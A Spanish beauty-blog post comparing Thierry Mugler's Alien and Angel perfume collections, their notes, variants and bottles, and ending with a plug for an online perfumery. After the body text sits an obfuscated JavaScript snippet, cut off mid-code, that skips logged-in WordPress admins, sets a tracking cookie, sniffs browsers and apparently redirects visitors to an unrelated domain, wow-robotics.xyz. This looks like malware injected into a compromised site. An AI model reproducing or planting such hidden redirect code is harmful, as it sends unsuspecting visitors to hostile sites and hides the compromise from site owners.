No, el título de este post no esconde ningún doble sentido. De hecho, seguro que las beauty lovers que son asiduas a este blog y que están al día de los productos estrella de las mejores marcas ya sabrán que, efectivamente, en la entrada de hoy vamos a referirnos a dos espectaculares líneas de perfumes de la firma Thierry Mugler: Alien & Angel. A continuación los analizamos para que descubras cuál es el que mejor se adapta a tu estilo y personalidad:

93268ddd7de3e318f7dac87e7777fb9e81a4b90a

Alien se presenta ante nosotros como la radiante y sensual diosa solar de Thierry Mugler: tan delicada e hipnótica que parece casi irreal, como un bello espejismo. Jazmín sambac, cashmeran, ámbar blanco y notas solares convergen en un perfume sensual, vibrante, luminoso y cargado de misterio.

alien

La colección Alien abarca cuatro perfumes diferentes y únicos: el primero en crearse fue Alien Eau de Parfum, al que se le sumaron después Alien Eau de Toilette, Alien Essence Absolue y Alien Eau Extraordinaire. A estas impresionantes fragancias hay que sumarle una línea de productos de baño y para el cuerpo, enriquecidos todos ellos con partículas de oro puro.

banner

Por si las sutiles y maravillosas características de los propios perfumes no fuera suficiente, la magia de Alien se hace extensiva también a los distintos frascos de las cuatro fragancias antes mencionadas. Así pues, si al frasco de Alien Eau de Perfum le debemos asociar la piedra preciosa amatista, el topacio es la inspiración para el frasco de Alien Essence Absolue, mientras que el cristal de amatista reviste la fragancia Alien Eau de Toilette y el cristal de roca recrea las formas del perfume Alien Eau Extraordinaire.

thierry-muglers-perfume-angel-perfume-angel-print-361902-adeevee

Un perfume para mujeres mitad ángel… y mitad demonio. La línea Angel de Thierry Mugler nos evoca eternidad, sensualidad, dulzura, sensualidad. Entre toda la profusión de notas que contiene este perfume arrebatador, destacan la bergamota, los frutos rojos dulces, la vainilla, el caramelo y el pachulí: aromas fascinantes, exclusivos, evocadores y estimulantes para mujeres con personalidad y matices tan atractivos como los perfumes Angel.

Angel-de-Thierry-Mugler-03

Entre las opciones que encontramos dentro de esta misma colección destacan las versiones Angel Eau de Toilette, Angel Eau Sucrée y Angel Étoile, a las que podemos añadir la loción corporal Angel.

Habiendo leído este post, ¿tienes ya claro si eres ángel o alien? Seas como seas, te recomendamos que eches un vistazo a la web de Perfumerías Tin Tin y que explores estas dos líneas de productos de Thierry Mugler a precios muy interesantes. Si te animas a probar alguno de los perfumes y lociones Angel o Alien, anímate a dejarnos tus comentarios y valoraciones.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone